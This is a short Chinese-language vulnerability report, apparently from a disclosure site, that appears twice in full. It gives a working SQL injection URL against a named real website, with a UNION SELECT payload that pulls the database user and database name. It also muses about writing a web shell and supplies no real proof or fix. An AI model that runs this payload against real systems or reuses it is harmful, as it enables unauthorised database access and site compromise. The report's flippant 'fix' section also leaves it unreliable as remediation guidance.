sql注入地址:
http://home.focus.cn/huodong/sjWorks.php?act_id=132 and 1=2 union select user(),database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
这个注入点毫无限制,写个shell如何??算了!!
漏洞证明:
狗哥让传张图
修复方案:
疯了,都疯了
sql注入地址:
http://home.focus.cn/huodong/sjWorks.php?act_id=132 and 1=2 union select user(),database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
这个注入点毫无限制,写个shell如何??算了!!
漏洞证明:
狗哥让传张图
修复方案:
疯了,都疯了
阅读:60096 | 评论:1 | 标签:注入